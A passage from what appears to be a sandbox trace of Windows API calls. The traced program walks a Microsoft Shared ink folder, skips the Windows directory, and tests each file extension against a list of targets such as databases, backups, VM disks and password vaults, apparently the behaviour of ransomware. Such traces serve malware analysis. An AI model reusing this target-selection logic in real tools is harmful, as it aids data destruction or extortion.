hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.938] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.939] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.939] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="oskpred.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" [0039.939] PathFindExtensionW (pszPath="oskpred.xml") returned=".xml" [0039.939] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.939] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.939] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.939] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="symbols" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols" [0039.939] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 0x0 [0039.939] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*" [0039.939] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.939] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.939] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.939] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", pszFile="ea-sym.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" [0039.939] PathFindExtensionW (pszPath="ea-sym.xml") returned=".xml" [0039.939] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.940] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.940] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.940] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", pszFile="ja-jp-sym.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" [0039.940] PathFindExtensionW (pszPath="ja-jp-sym.xml") returned=".xml" [0039.940] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.940] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.940] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.940] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols", pszFile="symbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\symbase.xml" [0039.940] PathFindExtensionW (pszPath="symbase.xml") returned=".xml" [0039.940] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.940] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.940] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.940] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.940] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.940] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="symbols.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols.xml" [0039.940] PathFindExtensionW (pszPath="symbols.xml") returned=".xml" [0039.940] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.941] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.941] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.941] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="web" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web" [0039.941] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 0x0 [0039.941] PathCombineW (in: pszDest=0x2e4c0a0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*" [0039.941] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0x54ade0 [0039.943] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.943] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 1 [0039.943] PathCombineW (in: pszDest=0x2e4be98, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web", pszFile="webbase.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" [0039.943] PathFindExtensionW (pszPath="webbase.xml") returned=".xml" [0039.943] wsprintfW (in: param_1=0x2e4c2a8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.943] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.943] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4bc48 | out: lpFindFileData=0x2e4bc48) returned 0 [0039.943] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0039.943] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.943] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions", pszFile="web.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml" [0039.943] PathFindExtensionW (pszPath="web.xml") returned=".xml" [0039.943] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.943] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.943] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.943] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.943] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.944] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="he-IL" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL" [0039.944] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 0x0 [0039.944] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*" [0039.944] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.944] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.944] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.944] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui" [0039.944] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.944] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.944] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.945] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.945] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.945] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.945] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hr-HR" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR" [0039.945] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 0x0 [0039.945] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*" [0039.945] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.945] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.945] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.946] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui" [0039.946] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.946] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.946] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.946] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.946] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.946] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.946] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hu-HU" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU" [0039.946] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 0x0 [0039.946] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*" [0039.946] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.947] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.947] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.947] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui" [0039.947] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.947] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.947] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.947] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.947] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.947] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.947] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwrcommonlm.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" [0039.947] PathFindExtensionW (pszPath="hwrcommonlm.dat") returned=".dat" [0039.947] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.947] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.947] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.947] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="HWRCustomization" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization" [0039.947] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned 0x0 [0039.948] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*" [0039.948] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.949] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.950] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.950] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.950] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.950] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwrenalm.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" [0039.950] PathFindExtensionW (pszPath="hwrenalm.dat") returned=".dat" [0039.950] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.950] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.950] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.950] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwrenclm.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" [0039.950] PathFindExtensionW (pszPath="hwrenclm.dat") returned=".dat" [0039.950] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.951] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.951] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.951] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwrlatinlm.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" [0039.951] PathFindExtensionW (pszPath="hwrlatinlm.dat") returned=".dat" [0039.951] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.951] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.951] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.951] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwruklm.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" [0039.951] PathFindExtensionW (pszPath="hwruklm.dat") returned=".dat" [0039.951] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.951] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.952] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.952] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwruksh.dat" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" [0039.952] PathFindExtensionW (pszPath="hwruksh.dat") returned=".dat" [0039.952] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dat.") returned 5 [0039.952] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dat.") returned 0x0 [0039.952] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.952] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="hwrusalm.dat" 